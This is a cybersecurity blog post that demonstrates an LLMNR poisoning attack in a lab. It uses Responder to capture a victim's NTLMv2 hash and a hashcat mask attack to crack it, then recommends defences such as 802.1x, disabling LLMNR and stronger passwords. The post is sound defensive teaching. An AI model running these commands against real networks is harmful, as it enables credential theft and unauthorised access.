Understanding how attackers can exploit protocols is crucial for defending your infrastructure. Link-Local Multicast Name Resolution (LLMNR) is an often overlooked but easily abused protocol. LLMNR resolves hostnames when DNS servers and other mechanisms are unavailable. It is a last effort to resolve the hostname. However, it can become a powerful attack vector for attackers who can intercept or poison the network traffic.
The attack is straightforward: An intruder (or insider) listens for LLMNR requests on the network. The bulk of these requests happen in the morning as systems boot or if there is a typo in a request to a server. Once the attacker intercepts the request, they can impersonate the server and capture the victims response for offline cracking.
I have two virtual machines to perform this attack: a Kali Linux machine as the attacker and a Windows 10 machine joined to a domain as the victim. We will use a tool called responder on the Kali attacker machine to listen for LLMNR requests.
sudo responder -I eth0 -dPv
Responder is now impersonating several servers and ready to respond to requests. On the victim machine, I’m logged in as Judith Villa at the IP address of 192.168.77.11. Judith works in HR and would like to access a shared folder on the network located at \\naxslabs\hr.
Judith unfortunately types \\nxslabs\hr instead of \\naxslabs\hr but is still prompted for her username and password. She types in her credentials but is repeatedly prompted over and over again. She’s finally had it and storms off to tell the IT team that they need to get their act together. In the background, the attacker has captured Judith’s NTLMv2 challenge and response and can take as much time as needed to crack the response hash offline
Offline password cracking can take a long time without significant GPU processing power, but perhaps the attacker has done some reconnaissance and has an idea about the company password policy. Maybe it has to be nine characters total with some kind of special character. Starting with seasons and year might be a good start toward putting together a password cracking list.
We can copy the NTLMv2 response to a file and just play around with some ideas with Hashcat.
hashcat -m 5600 -a 3 hash.txt ?u?l?l?l2025!
It didn’t take Hashcat very long to crack the password. Judith doesn’t have administrative privileges, but you can see how this could be devastating if it were a domain administrator account. In some cases, the hash doesn’t need to be cracked but can simply be passed to an authenticator.
One way of combating LLMNR attacks is to prevent unauthorized access to your network. Configuring 802.1x Network Access Control (NAC) ensures that not just anyone can plug their device into your network and access resources. Anyone wanting access to network resources the network (LAN and WLAN) must authenticate. It isn’t perfect, but it is a good start to network security and is likely necessary for regulatory compliance anyway.
Active Directory environments should turn off LLMNR, NetBIOS over TCP/IP, and multicast DNS resolution. Problem solved. Of course, turning off multicast DNS may not be feasible for all networks, so that will need to be a business decision.
Establish good password policies. The National Institute of Standards and Technology (NIST) recommends passwords have a minimum of 8-16 characters. Ideally, these should be complex passphrases (lower and upper case with numbers and a symbol). Passphrases are easier to users to remember and the complexity is more difficult to crack in any reasonable amount of time. See NIST SP-800-63B for password guidance.
Empowering individuals and businesses through cybersecurity knowledge, training, and insights.
© NAXS LABS All Rights Reserved